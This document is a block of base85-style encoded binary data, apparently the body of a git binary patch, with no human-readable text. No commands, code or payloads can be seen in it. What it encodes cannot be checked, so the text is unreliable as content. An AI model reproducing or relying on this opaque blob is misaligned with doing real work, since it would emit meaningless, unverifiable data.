zM9~q;qZCDv7I%>s_fQsp5g3C}7>6<Mdhz%~5f=mk7jjV&jnNsOF$jrK8mEyOtI--m
z1{#OY6i?y-1mXco@fEf)8^@6x<L?^J5gpS}9oNy*%8^P=A`)LA00bfc7?By>5g+pr
z6WNg;`_Ui&@fGzEa7^(Q4&WgUU>he<AQzG$PY)m;5+Wl~B2lm*C1VX*AOj4d49dVD
zGN1+4Kp`tqB;9c$OVa-&PZA}yZzTN%0KSn59zbReXeDPd8&lFIZxSbS^66-@A_5=-
z>@f=-;RNQf7LJf7kMbFHQYn{`DVs8}kdh#nkr@v#`n(V-uaXv>QY*KTE4vaKp)w(J
zF(IH2E6Z{fy%H_cQZ3gq-^|i2-?A6kQZDC`F69y~?-DOTu`c(LFZ)s{^Aa!v6Ab;5
zFbmT#BT_IEQ!zjAFdNe`9}_YoQ!*!$GAq+EFB3B}Q!_V{Gdt5WKNB=VQ#41DG)vPo
zPZKp$Q#DtUHCxj)UlTTCQ#M^u31UDAbYV7gQ#W_>HFZG=;y?+mPZyE^IC;}Jj}tjR
z^EcxFH?5Bf?jZjOVjv#kVIHc}I<FHuvr{{_lRLZ9JHHb=!&5xRlRV4QJkJw7(^Eay
zlRewhJ>L^P<5NE8lRoRyKJODh^HV?flRx{@KmQXz15`i<lt2sAKo7J#r?XVnz!a|U
zBz!XpqTo9tltL@iLL+oMFH}P*G($I3Lp#(%EfhpUltaanL`Bp@PqakCQ$<%4JX;h)
zQ?x}#^h9ZtL~S%ganwU~bVGUcLuFJ&ee^<w6h&DSMv1gSk<>*e^hklUMxFFVp)^OO
zbVsSQN3HZnjdVt_bV#|hNME!`wKPb*G)c*HNxc(BCDcq~R7{_=O{4Tpr!-EhbWX3-
zNN<x18r1(eZ!tOh)KC93GDmSw0hLe-)llhDP^&Ld50z0H)lqYDQCTliAC*!o)l&I!
zQdKWgFO^d})l+|QQ&BHeKb2HV)l>y>R7o#YPnA_$)m2+?RS7RvUzJvC)mF1_Rs}Ct
zZ<SYj)mQ&+R{<|rf0bB^)mSxdSotnlkCj=Q)mi;%S@AAfpOspx)mlepTA?mmua#T7
z)mztNTb(Xkzm;6e)m&#{T$wIi&y`)<wOrRV>EP8}=apWaRbGwmUh7p~_w`ou73l7j
zPx)0~2i8;lmE$ClU=vnhnH6F8)L<7DVk7oA8`eQ>(PA$aV>4D`H<n{N)?+^wWJ6YD
zN0$F&OV(sh7G+abWmlGETh?V?7G`5sW@naWYu09O7H4x-XLpuod)8-v7HET3XovP?
zxsPa%7HN}KX_uC1o7QQc7HXqbYNwWJtJZ3-7HhLsYqeHlyVh&J7Hq>-Y{!;t%hqhq
z7H!j3ZP%7<+tzL07H;EKZs(S6>(*}X7H{)bZ}*mO`_^y&7H|Vsa0i!g3)gTD7jY9;
zaU+uq(%=go7jh%_3tE73E0=O3w{joXaxZssyI^wD;Bq-vb0wE_OV@P2APpqt4<Lbc
zTi114_Y-1Qc4wD%KY<o*7k6`4cWI$^dslXM7kF{kcYQZ_gLim)w|If~cxyL#cX$7J
zX}5WG_jzYGdUJPrf46#X_j+SDd$o6ayO(#rw|lqOcE?wIvzL6qH+{|bde!%Qt9O0T
z_kE)`e&Kh1o40=H_kNQ%fAM#Ji?@II_kWFdfR(p^o%evHH-W8pfrYn$y|;bYcY577
zg5|e@?e~K9H-r6mg9W&Q0r-K#_k)8M68?ZC9QSlnScO|4avhh2Cs&1IScW6F3*cjQ
zUl)gAH-rNigh$wbeHej(Sb>F@fr;3GjTnL_Sc0FIf|b~Uofw0mSc9dQgQ?hqt+<D=
zn1GR3gthpGy*P-$c!<Tgh{^bf%{Ymfc!`&{iPiXt-8hQjc#7q?is|@@?KuC7@py~T
zxQq4pi~Tr^0eOrCxr_<<j14)B*?5hQw~ZA!d(!|C(x8R~!gFWXl1;Y+N}vT?xP?&|
zb<@C;RTz{<nUqU;lG&pRN_cTsnUy_pbxpVy92bR4xs*v4lskErZ&`CUvJ6__0v-T$
zA(xatnU;&$n2p&z(g2oQnVFlJ5dUBd_@E1pnVO54m}hx%OW*+>AOjBI05SlaFW?JG
z;0vbtny0y%sksZ*nVsEZb)6ZW<GBq#;SbPxl-U`d*_oF0`JRWl1j+yey7>V5Kn)1G
z55D;TK%fQkS(5YFp&uHe*V#Q-SDq`{qMtB!9r_P8nxi{fqyK;m7#jbEFQ5!EKm`<l
z1Job@R$2knKmh_Er8A(HK{}#4x}(Ver*m4TcbW{?gQ71QsDnBMV|Sx@+Nh1XsOuT0
zJ+}pT*`!hW0~7!NraA!n;H6<Yrqdv#>)ED3`l!E}r+pd{gqp0&+W%q~tkXKDL0YNP
z-~j?!pa(htJ|F-9-~#}F1FBl3=b8ihK$$~2mb*Z$2Ro<5+N=*7v8(TP2^*|yL8rM{
z1-zM{3%U>bV5O(}15#QI@;aphKm{`30kqn&8GEn|JF!n2wFz&rjT$DxnhZet3o<|f
zW}C8KngebdrtKO4X8WZ9Kn3hNuRXG-dwPR@I<=1*xuFiNc>@2Z9Xk!mKm}Ghuhl>W
zRKTULnzI3*stGy(4nVg#KmjsfxH-tUliR${8|Y%UF8%-`Ejs|N`k)Wsq*waAU%I8O
zyQMSxy}P@HiJNq87rg^qz?%)gd!nbifSV8Cy5rlb4_c-{pbWP80XEW`r8=+QTLoIc
zu{V5l3Vgsn9K;dJ!*`;mzo4WCS`8Fj0Y3WyUbq&zV42APazUUEwEL>dfVllTbVfWU
z0O1d8mwba<$cLQB-#3yuA;gp1Y}MPqWgG;eyS~)`v?bZUbKJ_m-~slV0{|c+1wzL`
zhsSSXb%}S8hqsX#xy;FYcUyOvmE6s}mdQz6u*;wiZrlI1J(9}5yd`8j1FSl;QKf^z
zye3{*^$7jV4?SYzTql-VwsE_!%RsC3{3XcX0S5ZEIRFF#ofdS$4^(;e-WkzDJz*6c
zCziSe>YTF!K%on}CSrTDIUuSvT_=9L`si8IZ=GLB{U&f4bbs5<4*-~1ohHZt1W+2d
zzkq`TeI|4r^_U&kpS@h2eI}Ngy}i4x`#`3@pt*0N42=D*yZpa5Jtw3+^lTT}&z)V#
zJtmggt*xB{KD!LGJttbgyFVba4RV8&T_)6h@c13w|D9Rm{0;`5;0u1>b72h<ehqNJ
zzsum&Jsa2^8y6BD7jl8%8}SzIK;bif;%gxT?E3%SGv4A2e&BDx<WC;uO&&f9d=OgR
z<zF7=UH%cbHfIGQ9nvA@b6)3np67es=YJmPgI?%|p6H9-=#L)hlV0hUp6Q$3>7O3z
zqh9K#p6aXK>aQN_vtH}Bp6k2b>%SiC!(QyiUh4&d$w?mV5nkaL-XI<Ts#hGel@S*h
z9v3eD77#ueYhmKaU=3=a+qe7!4nX5G9_>@!@K4@7ZrA8%p5|}X=5e0vBVY0-pYki;
z@-H9rGhg#JpYuE4^FJT-LtpeqfAiHF?N9#>a$)XuJj?Ogv*Z3Dx>2ih0TS0>xIr=(
z^u87<eakT&B-g;?3;zxdKjquw6KbL5aYFy!4>n+J!ruWN`g=9`k013(J{RyFA}#>c
z;r;?BSMP5@AiAFnULhBHx&#bj;XD2SP?`fCAoZ)i<cS~g*<;fOAt#of@SZ>V_rF#F
zVo<G5cM2Lji11FXHEU`)bl9Rqh5#G_^vO``!G&6XAU=4I=FXZf8P%x4D6&?I3@Q`^
zs6}PXtAn>{+Pq^kr_Ngsd;0tdH0Yb4L?6<kRWzy6rA(VTeOmM=)TvafTD^)jtJbYt
zyL$Z!HmumOWXqa8i#Dy=wQSqEeG50P+_`kWCcJBK;m->X%DCj9pv;3784qw!^YOtK
zoMh5`0g*wl!#lMy98jU6)~&n+b$0*Wx$|q9TFj_Qt&2J;($uV5yM7Hjw(QxoYumn!
zJGbuLynCO;i+5qeo+UoE44~jaPmNz3mk9Z44X!n0*4)Z<hl)eX89>xp6B9el&7VQ%
z?CJ-SpJ2gEul8M4`_$9$>)XGNKfnI{{QLX=zt#mO07%qEshx2_1_T^nh8YB8@W38h
zq0nH36&iwJgBhA(2nt{Ucb7xM)$&CPEeLi%AILq>#dKYeK?W``e$fSX4CN)>c4d?x
zVoa3Pf|q$Zag`n?wL~M(eD4vs6@5%T31yU0PDy2zR$j^51q}`;rIx5+l7WR58q#0}
z9bu&*hGcT6W||g$2qHp1eewSVUu9UPLLZ8~nB6VYHP*!%B4I~Gp@s5POBuCH2jnd?
z$q8h6LL!<~kq!luBvejf+0>?-ehO-+qK+CC3V{S-AgQVnm_`|a7}6FPY8rwOlv<iW
z*BK{NNWcS-e1XX(w3NXhhss?wYqD)7+aR2A8Z>7MAC&=_WrM-U5EYwskw%TzU1#W_
zWOSiuqm)sR&}5P#8d|05Jrqnd?oAo)ysO@eZ@&6|s%3_l*w?~nNx35MzEhUb2bpZy
zp+cLf5_l`Fa&=Mc31<+s2>}>#S(UPEo|@sT%{p6<Q;wZ@r%DHu(ZUyGC{!qQX@uls
zL5CJPZgn%&W$8nMWcvS<r}_$QaM4B|P2dA*!phdtAqPUh4X%7uMw@oPcSe{5B&9Xd
zZxPU70zHAPtjA(^%(O#fmo4(yRoU?>hJ6^gHro!ucfqW3F>J;G|0=bs84p8cw*UgL
zsVrS&bW~?wAUr@ucZy9n-7QqKtU`+!PzPS23ymx2k8_>zZcjhkYc$bbug-eww-t+_
z8ecSxIGGzZc)%E4<&ELizKx+mg@ZqoM(_;^;CfnbKIF9B5>tg?PtBJ-GE-#~T#Fro
z%$n--B0s;|1qpKqep_S&pTWgU-OwNzXnTwaCbjE57mSYCSw<OuJP_G)xE%V5E<8>!
zX=p)Au=NTm;G+KpjuKs5NM|IUoK8tdQ(f{dh`|iDWe>G8!wuN-Ju#U<5Q0#_)wptj
z8z9d&7cgFf0s)i@#Endu*&WAxa)IH!ElkrhgPHV0KZlHoZELbh^d4e6B5tTDCon`H
zP6#)LNpF74Dj#lm7sR%lfkD1=N(jtw!>24uO$Ttu0oYcT#+0ZpifUP8E)cLa<N`+3
zDPS7FlZ#hO=YV8bj6y~Si3my%Xil-<stl>YL@IKTTRB|s$W+F)%t`>8sH6aH@I^xi
z;%=jIg$O_B6FZPkO`zP0`1%mWTHH#9P>EO%4KcU;XpB~4yATn5XvDPDA^}QlQ>_5U
zCKED@dp`fE8})vf8}TVi1q49BlF&k-1E|j_xB465LT0;TRjq7k<d(Fw*@Xvy-~x1t
z5iW8eBZs(8oz+1nLt4a;xdbvO6Vwz^!iCR#>T{p`?598RxrHqhDxl#CC_(>;(0*>A
z7Kmh|Lm#@xU{!Jx*7QlS2p|A8Vec#(g2YdnsHSOtY7DQckRWE~lj4!j3@SkBRyMKH
z8@dt|SGiRgMCy|=G>DZ&yFmgtM1U^t4sn49!G?GMcR+~0x*sf3&kzSF<yit@2AB3k
z00}q%0X7m;pKKDTMX3-ngA%4A){i9L%z#<>0wFqmM<r^7(L)HcsOdZ=Mk8{dTGAlM
zpVTvGv`DD`U;hf&f(n!h2OX$E0~^?YHWZ?aZ7k~ohdZE<p+W+%gPO{fmX7{JerkH=
zmA1GcL7dQ{X%cN$x)8iI$<#tB*yvM&$5mCb6sJe~DdNJyyQK-vR*0J)n;N7751EBR
zLUjl&T-YG6Me-qG`f5`w<hP(;0(QEL%eWl!5y%|CtdUuc3L?`2I2N!42RN3D{*Z=0
zFbXcEqbDId1rzz`E1(Q@tbOl$!5Nb2OjFHJN6yGpqEN_tYchjyoieLU0A-Y}rApNr
zbl}`jC_}9U%7n=zhz46_n5x}NnoLL)3Z*hAyILWBr_wJeK1rz?QsMzLj4&#;3BpU+
zq=I|@Vp*1601`6Xl23>Wy;%ifYB)4%7OhKG{8{DzkyLA|F0jsrxb-0=deL-7#FjMp
zAt`$;ButF9P|u!t%w#5&D{RLm%svFbf^Y~(`@r9y4A^-QZc2hTdt|F*AVW9K%^8eG
zCYk~Ts^shQRv6Ub82)y-PhpTpmjY8pmzgQKHAHOlleZ4aSWSHh1dNqPW2K0)h7aLG
z@D9L-hrrDYCU(fJf-JH)|AC6GVdIjSY$C|jqA`D<<CN8j-89Gu7j{hx1iAd)`-njd
zeaXb6AA$!EXyDn@e)gUn1Yk*X)(~9EtyAT^X#>OB5QcWMnnp|&0GolfwW-=Bxg8Y$
zow5ntRRQgqoZFLIVMv<SOv)#Ea>NW}pxpSf1A`85X{?+w;h5gE^UN^XABVfn0tTZ`
zcBKNGHmKZ?5bIOiWQGv@1ktx`&9ux~3noM8IUV`+Pr86I>5w5NSXK+^woH^Rt7UO<
z?#Um19+WQhS}9^!0002cfG3dw5|F?H9=^bINK~{f5>P`RL{ROlpEzM1x`BVEN<IUf
zVNH^jGutR`XEoh8SQkLF6MdnTGq9=bwgE7PqD)#gO&u#>BOkpVqHi;}E$v0|5)xrp
zixx8+O9T*vZ6l7`#bdgcRqUI9&)yWU4KCCVk)Ih-oo|mj1>~Uoh(p*{yIP<BoXIHy
z0n27LbfC=aP8kTvA87s-Ka2tAK+!o`!eD@-PeBen5knz3002v9;wOc$Km(GVlsORM
z=nZHCffOMD5{8UJf(St++=7Qb^q~L|(7O2>o8muooJ>yDSc9hN_MZPlry@i9bGg6L
zF(m-<R)Hyo@J$<{<W)f-fMwDZAmw9Ap;Uhd6le5kd!aB6;Yr0MZ<0qBeK&Z<WH*EN
z6r(`^dg2g2<vba}fmg9M1V(~cGD<TxL}^l7J#k@jV}C&bHcP@gJ?BYfr&A@!6hrg}
zXJA_ia0Zr@EUocPeZd{9w=yl@R(SVT7XShv&<EeaImKpkW8j27lWb@IAqFOJbR<B0
z4<QCSaCDY{bw0rW&Q}0RF$W`XbOjKGwEzT1$AG$leI&Gk7$OK)=N2ha0HAPwf#^_S
zg?MqpXc@w27p7+MHY+pOgS{m}hHwLWR~3r58w1995?3LP2o<}MA$1sfpXd}6f^TED
zTiYRSIAjPa0D88uJVNAfGiDWg5CU)piz3v5R%8_*2Wq-#8!4tH4iPLUaBX5jWER$l
zPXSd+f&!wKD7aKi7B>}QasaN-FcqQ#u3%)r$Qo;egq5KNWuO8l@f=dt6Yj%5wWk6f
z00LC-2PFd+XRv#{w}oaQ1`Kd?6A*{B(1p~uhCbl|24IFw!3M?ucL_(w2#b&(cPI!q
zz!w)#0v=!z81j8>A%B91kr#Ats7NLPlW87=V;Vwt;FgNJ_*=MGA;*FhVHH)o!9yDd
zR=-7XR^f?c0*Zk5TQ}(tXRuY^#xYuwaX_&voY)#!G(^rrlZMbm1SUdUfr3@ULZhUM
z+ms<M2!omUh$00xFBm3uCU>WJO-_@CiPMeY#YVND0szo<eXueG6J;p@8H8~FAHV_C
zaR;~{7iaJZyr+e3VSLEf0f*2Nk`R1I*8x9)1OmByQy~Ti2>=PXklEK}KEVb6CUO~x
znVG488Dbz<1WJ1rXg+a`wx|>+K$J_7CVgfHo6vR^qLNnskxA8c8+`|pKyiXInUsm9
z6dwt1PjM?Kpp|BDj5`$+k%k+ygiN#vY5=$tyAlG^q=7Rga9k0c9z!O~`HQ0z6nmg<
zEh%89`4bKDfRzz}J;5M##y&wg6)iTFGR7J+6A_M63motPNT>qk#ZGufEiEud>-Yf~
za0~G?7ilncH31h$U;&me1wC;I7Jz(5HvnQN34ke>4uJ?$V10^k0cAh}5Ak!>XM9~i
zh5!%(nIH<zCWf^@F8Lz>5>gusiK0CL1maf!D5?l}uo`$!1~*WV%W(rc3I;!s29Pk5
zH>wAT;1IKb2e|nFKPojZhX;c85Q@M6r4XYQx(QPMs+n7AA1@g}m_SCg@Rei|RAov4
zB?Xdak(xq@jqD~yk+mCQasjB|qCN3$WHP69niX|ZhpuFm3V0zB^C~?NOGLpT`Vu%+
z^=%LpF-36#T!)=iaYj-lZ&H<M5e5kyvWN&KGA%|#bs=-LP(Z8q0re?P<G5T+m<D~p
zgu6DEA3%kaA{U=fQ3m=J3y`1~&=X!@0RUha01yFTc#lVy0$~^i2^s-M(5uOZq<C<2
zVpDV$u&kC~2@P<V4^apbaCF-W06gd#Fxr6QSCJqf0m4~z;&($wAbu06Nj;i)Y9I&%
zN3MZTekmsbhM=dla0Dh{5-(H=JyCU&`4C6{AOTQgQ5eF1T&l3R@s*ahX0cNzC}~R$
zYZhxdXcdB+O|gE^s2eCr02P%)7V@!iXLr3B6s|OqOhF4_#WWswkpSn5qSBQ2^=d@{
znxsaZhVYt`)i+ZECT8#|{FV{hld?;}ES`!+bRlz%AuWQD0j2r@iUNfPa1yU)B8id#
z{JCbO3IJt51-Vccqyq>(6BkwBd=t<U8{mARU;qZt0bw`?3%~&!Fl`Q@2!%PfW#|Tt
zd2|t=kht2bb4#t)S__DPeAK$FA7BZFu#c|+u0K%$5>NmUS_=yxnIt5B^;#KyfQM$l
zu60`r9)JV|aE9jDX%!i{fpDc60I!?><hg2qA)splk_(6r5xINV6WCV(XuGhzs~e8w
zL}nT{U<8^4CML6@VPA0}<2g1N0-l#gCeK@xYodpngtHnlvFe!>up^Co!F3dSXl5X0
zKw+G|+a)o(W(|_CSK)PEC2zLV2W22ikYqeUJ8mJXX?fNb^0hd0f`n=SwOK1Ic(PsH
zkv}XmbAnPC^!Wh+AXR|mKJ}OugxLXvTMGtY0SHhF6<`1ja0(7F2S_ltF?zR0#{nGx
z26k{Yd<(2{AO>N;1|^V>hmZ(v@DPP*2^Coe$!7_R+8PXrq$4M}A6&WjN<t^_D=7K^
z;^%l0f(H%bMAlaemoU1Q`4BVz+6Pvgx>8&VC7=eJn*jgv#2gX`QoI9_+o2C30g~CH
z3?R9hYrb(T8*VoyD|L++Vw!oJ$LhAJVUZ@xo4!~H6`*MbT8bOnQ(CUeF}$eATM<RN
z33%eChwEz<8FiB-W-yrGrs$^>djM6frWKn2OE}ebz4K_5=0Tgx6h}+F(#eh11rt2c
zM_=#}82|uKdjJ7L%e1#$g7F1Cmj)T208kqM2S5@&5oK9e78k>pZy|jEzyZT225txd
zA|MAN;CwmY5QWge8a$;2Ft_?>kO(QPjtQ9$fz8k76D1(64Pe8uk*#}pr4F$J4N{{H
zVYvlR0Oh6#4sa^pb^wz9dxl{^2pr-G#<~C)asy$Qx-sg{fdJ5GY@w3tJ7K^88)D7)
zEV+~`#~tk&U~0UP*d`-+VMW^&nzdOgb&TnjA*wvbNt7(h<#yEzNnDWzgqDD=_FJ9?
z7I?awhpI2um|Sjw253+v>97<!6{*lul0D%JPn{0wFbL7$K4oBmK_Qz;k=1SSBWv&n
zC88({T&ijSS81@J`SSoRHz&djwG7MwON|y;a4};W7jrP87~sMlAbfJb%?-f2Y1jaa
z&=bJN0hVwG`^dtKP|gUckPqPi&R4rV@z@Oz*{_kUr;@J(8#ZB>&voz<Zd_D9fd`Vy
zyJ6r37*YrC+|L;QataJxuqX=JRt#;V?b!P45Mkf}7!o`a@XnEY&mIljsqp|+IZ+eE
zvd&9@D@BQ4fzszl$1a@|a<^~2QM?}W5H+bL+f$yQY$2<~XSgNES1FwP;tCBJJkrY*
zXfO(+VAN8Q4(q@aR`nIP!e7{c4a0!n!w}U-@-z00)K+pGeUt%W4Ydt?0ckKJiNPa5
z@da!RwMPfF3IGDij24D+Y;l1I(wYMNr~uaL5R!ld)JlA~Y6+DMd=2oA;|#2go!E`-
z5E9U<{O1AA*9o$btr!vrN|+&-{Sf)g(GS4@NB}iw@CHTh2Y%26YES@H%m#g+1|jgy
zh(O!6Td-394B7;62EL%>MV{oLT?@F~AbKDNVc-Ddcg8gu28ysr1n|zm?dEc!Zo}hB
z4U)XYVg|1%7HRSTs8C54K#V8Z$4-F?Y?1-YpbqLFFIUt-h=`L&8(>4#y*LS$U=cA7
zchz&zcS3c7;pVMMVc*QaKEkD(xAdn^fd)~%HI8mJ_VF_k+!K&c>Q`}a7jp;vJqS_V
z>aAYXNJ1s<a|dnr;00c)0RR#{AuX-y6JPBY!p`g*Z~zZ{7KM@pJNa*MAqD|p0dI>4
z9bB)H;02bz0Sbno4N#%C-OWG2!hY)zE#4Ct%&pwo&Vmik_ew+|;0Zn9<3F(gqgwzL
zvaVMDR{%rd5EWo`_pYy!3%VOz<r;k|4I+LGViJK+01{%+4PwnwKDijL0TwNO8U5xT
z?-rc!y?ZC!VM-K`Wzt)rA+9UZ99xOxQwD~P=&s%xJc+*>W2cU;lhlN6IaC&QkOBHN
zD}s;#lq?&sSPQ&JJ?L8$!>}4%r0P(46-6D@4iWX=Qy;m`L}0OM#@q{o&>lpw-qAqz
zRPq4B%<RG*7%n9+F9K{2!7XQB;J2LiA0XjsQ7ApJSY%NF37QG%%+Wv~t$vGq1>oXe
z?zY~n;^)ln=I)>m`tHdG$F6bXddO)9Kymr*6P9}_;^+D6iXnA60;B8MDW~LD+RzOD
z9|)iC`LK(x4gm*i%;smF3A!5rVXy$FV)P)-`(mLq95Rw6%Oz5M>*+8G5|}0wuBI9i
z=ubhLn}7|y&<jtU8!g}_G=z87zfuaL{1_=Q;KTIHQx#;eAg8$1;dvFgE)XTxRq&zy
zO#$s&@dZ#7Tt&f}4x#m3@v)c?>i|(p;6Q=}4IV_8a9|5H9~?e}2vH4)7GwmjsntcG
zMT1=)D2Ny`B8LnLO`bGJg-StMv{1f;iExAkOByOzXmDs?7y}jpO#uLagdBoAJ0LJ9
z=2B2biv%iV>hx((4x9d5#d`IW&X`@jDl8<ykfB5<7f2{Dz~B)Hfe8G86jv_)Bvhyf
zhAj}H7LY!D2)H3wp=~CCY~8}08@Fy?v~C1X0PLYa0Yw!81p@q4^JdPSJ%0urTJ&hr
zrA?nkc)-k96bK)T9qUS9x<P}|r9*?J))_Oa4Lv}O@<4_QX9j&1)Z5G%X1#hj3m*M~
zZ$koI-6l94wm>l0qkjh<9wh;R<OiBRSyD3@cbm+ZM{hDg%-RHN-ycN4H%j&5P2;c6
zzk{%`Lp3v0$lw7;zNiHfS8h;Eg@N!B?E+>5V&(z?U&??3kv=>CgfG6}hzv5ium~4}
z()cJM06v6>gEFF1$)J`tJO~j300<!f016;#AQLR$-~dZ3v7;cPkSYlODgYP>(#fU>
z+Q5JYrod6Oumlk#k<1i2D=mW<P@{koUJAp5-nuwKkU+pFNU%T%tAzn1%zSAF3CsXP
z1w%xTBMb)maz&5=BFHjPMHgkXQAZ#B55NEgyiL;DoV&D_(e7{#Qq4Gd;D#F>Fz%LH
z3L+!aQE?e$7;H$Jw4hi!v(!>gL!)pYQ)|T!n^(UgK!pTUQ?F89b44jv0CTg?HrfC*
z_ExWKT{N0taJj(1-o{dHwKC3_aMsOkVD-3Kq8S928x}ROmM;zn0LBjkc%TK12Ev7-
zgZ^m2LwR8gU`By7($}*ZZFGszFpvl;sG$g&2>=c(X~3W*lUnNk$tW|Pav(yiWW*pq
zT98dzgSPC_EVR@rh|B^4;lv=4At|bg-at6uvM&XalTJG)+e2noXdVcWJwq5vk3b7C
zqz@JPC_n>~r>44UtFOj-5Oe{=(O5|_9i&sN1@zTdtxYwE8El3brZ!hcLpEG-zdBaZ
zvFW>ypk3?sRWnx(5a`U=o~=8Wm+Brww`RS*FWS2eLL5hQqZw$E8wfz!koQi2Q`WpW
zJ7AM#w5Gfk(y^fhZ~-kck&FZWg%N-Q7}OUdg+PG)Lw^;xH#C)2I_O45#aJMy1{z56
zt{nkrU;>K`I0|E?qGTW_1cDUk5(|Qox@Zmnumnr1!@8{htdqiIInLff*g1nT;}ggM
zu?#uXpq>Q^qk^&6C&>K*;!}hJdNUcu^d=B(cw7P%xIhLzt~QQ?T&*_boZKjmAZ43d
z192rO3l8L2x%u1%<7PL`#LXbRsGtTN^}uwfLmiPimI|kZxD28ug%Ql#tU~A&6_mkn
zCP_zYR#%32<xXB85Xc>Fk&9du<WvLcLJ^G!Bh`K8cL@>RqQp=I<8{Dd8!%oD45A3=
zF^M2jiV`A>hX534s1{;yKu|0}fEKjiCPA5iRH{b4IjKxc2C<nLE>i|qltBV&D3d4F
zA{H|gKoj<B3j%8qhANEZGAM8bTM+5Uf~cvHh#Cn0Th_NT8J5zNr$l85oi(=@3W$Qt
zDhLL{mdejis~{glLk%@!OVg2Xm%0?l4Qc5g7P{~>tsEvoXvj722vcsn?4`N9k^xK%
zA{gE=NN&=xjy?1TH5~cF>!v8L0Jtj`RCvW5n7D>JDA9Jc5a&2QB)eJ^Ofv^VNER7o
z00US8lxN(5@kBAkGA5;ZPts#8suYyy4MYOlYnU7@F*cN$&m`zWNC_m+mu_)sT?R4Q
zYWNqYND`z3YUm5M%-~Ta4GL=MtHmYeR|o7R)227Y=>mP_3}@^LhxKt*Iuf!>U>*c)
z(rnfaInxUhCJ>r~tBu*<=F4X)6(&|yW>IthIyMPzwW>r#YEo&KEFC(>Ik$nJK(LAu
zSKR>(E)1*bZi9wVY%@H6$iR!_NkuB)0-pkT;zsuRFM)C9ufa=LqdsPdPGIbN*Lz+E
zAmCU4(DW`QV5k}2xP$Kng#!T~!QB+m7R;c;3wMHPK@f3(K6Hx!n@EWM3=vv`c%Y;N
zS#2Lw`dW)2qG<)76aE}9mORwdtH(udayK-Ho%Zw=aa9&tg__mKdF7}-jq7HZx>l|-
z(;&v`+f<vXR_}I&yPnIga=SZToPw3AVnwDxtQs~=dGJ~2)r_k~F$%aMwKnU(4I1qF
zoit=%u<`<cMSl0YzzW2`2i9F0I&)b6gxz$(z>7)i)Qb>5q~R*G%3y~-ykQcT*u;wJ
zYE{X5-s;Y9zU-yjd9U`~ufnRl*iElVfazaz-T1^O@o{Nj++O#xx5YZvp}3SP<Dt^{
zsiZLx?jTIXTA&RfEtoQu>$w>U6GWdIy5d2?oRTgV<ig0kkJ*MCo;Cm2&2NUYXm|zR
zXCgVpE)LM0J=5l@(Rjs7HgAy83uw>Dm&bqB>YM#+;}RE{yYaO%ev^vBUoz7>PZo`d
z(xBHYi=-B1zJ)_Lo#huv%${BubA_{XVGMuz%w|qCLRjt9v1UooamID7b$z%w*IC7e
zUNo<3T}wVsZPCH5G@+4wkhO;YaLI(em8rrj5H%m!ywOB7fcl$gVG~t@j;^7eBkgOs
zQ98z4qY$P))4Bq88b(M=NIcyQ5dajH%Vqwue`Y<9eG_ECC+YXUX}Qcq6?@kQM>w37
zwZjp%dD%cFIB0G?V?jS0Zw8Mhw6V?XNxeA7Rg?CwsEv(?Cp+8t+4jfrTyh3d%i8c&
zxw%&?^Kzfty{9=58Oq?Vd5@$cpC&^@YT<6ZO2~?>9!S2$({EP`+~2W=3DZsKZCfYY
z>Q_hj!arBuiIaOXV3jz=Z*}ah2O8rRpR}YmPV@EhnB^}1Dt;Iz=bNk0&+5+j4Aoxq
zw6C1%P$t8O`q1-v0%s-vy?gLOhTd}yocb$JS9*Au&T6DPy(>~LWmC(Jb<TI*^D9Sm
z=;;h`Vmn*hHve|TH-B+uuU@QbZ#K6f)$q4p9OiN-T+CTt`vt0g;<D%a+Ji5Av)7$8
zY3M?MN8Rbgha>|?m!d-iLU?Z)_OOv(da5bU?^idy=@`Bu<+cC)G8<d-TK_Y4*`9vl
z|GMw&AO7d%KYsx+)Be0a=6GEXY~52$+^7G#vO_x@Bd=yLw5uCH`WrO<>p!!5J+BkH
z+Z(pg=z<Z6KIUt_hfskR`GPyBvRaTbh?u^f1AspOja0)v$<w~=BR}pFzwaZz?u$XF
z^FRIDx;yJN`13XY6Uss2<3Wv6z#tStJd?l)j1J!eKJ{y$_<}T58nOgb!dOwcB-}74
z96}k3K(cZ>pz^LPj5{L?jWlS1G9bKxprSRv2r{_94;aCot3K<)uoMIj%X`5V6bSKq
zK|FLpJ)}6S(mG$N8?R$O+DkD)e83?@#6$!!aO=U~K*9#3E-IY89&AD<j6E*|Hepl5
zO)NA!gG5a%LIAufM>CBtC;=5H!!`_w#=DBa^Rx^kwE%Fudpa07{0=&-5rOMIJ;Xy6
zv_l!JK|j1fmqWMvOR|nLy>v6iEtDoq<iuyBKSr!X7|Nji<2WE3J7fyPu=6pzt29tV
zKxn)wh?B(sOdPa4vqBuhKhJ1^2OvB)RK<{ZfOh*3GweAA@tqp6MH=bFSHs1B4716L
zHDENEZv4Zry0L?FKV<nqbaY6D#71$HNY5k1Yb;05BS1^EJ8hiCWMjB=)IxH^I%}NB
zYZS6XbH-5Y$j&H%#B(=-Ag7&!5i^X(1AD^>Q;B^Hj(+sV6$HqG5l9NNJo9_DWP~n{
z>oJHlN*#p1VN}XbEXk;}x{A!mBRs#9%)8Xf!EF?wkHpF*)1|MZHIkIda5>3~48S5Y
zjTXVcg7}v;6hV8m#{(;;(a6cfN|b-oMZNS%q>I5jl)<5dL96+@t2|0%bjk-b%+LeF
zvUJS<&ojtiBTJiW%-!3_tz1cyTR_wRyWaE4${fX{Tt~_TO(KJ#<)X^baK|a5Nw<VB
zlXy+iSP8sbwK_aAfF!fM{7F9Svk5dzCQQs7B)DSa%EvTLinPHe6iad}&2EEAX#q}A
zRHdx?j?pB{&wRPiY{tJUJ?>1d=hQ;9^gHX^j1b(blVHu(Jc#qOsXCm&zY@%S3pk!E
zze#Mu-{i=LRLqjgAzN9_;{?#Hdc=<d$>J-{v=q-qiB4|}Q2tZN$;>#>Y)%86P@4kJ
z@FdU+waCsS4OC=L^o-4y7$*y3!Cr(lzm(5iq))$uPCmm=9PH0yl+fthxEO8F8_hcZ
zBkMW{-970nzNvdEAH~r~d{9h04yVjc1SL=To3jGlQ0$CIl;F83f{FB0&x9}{5)I0s
zjL)9L%_VeEq;$@Pl+ZCfQU)E;G*#1*gfSjnQ#NzcH&xO`T*OO^QV^xmn6T2WfE_Ij
zOoHrE-R#TU%$hJ&va6K9pAx<I^G`ID(?^BWNR?Epywgeb$T(HPNYqe;$kML}Q9iB7
zxJ)Kr1k6B1Q7`SwRwKw31+?TuNTfW}hkR8j<T^~X)LX^XT-DWGm7&(#R4n}$&xoCw
z6xLT9RX{~np+r?dHPP#ARbf2P2tCXhZNyrwR9?l_Y}M9n<<|Ox!~|VWVl7txkvM>c
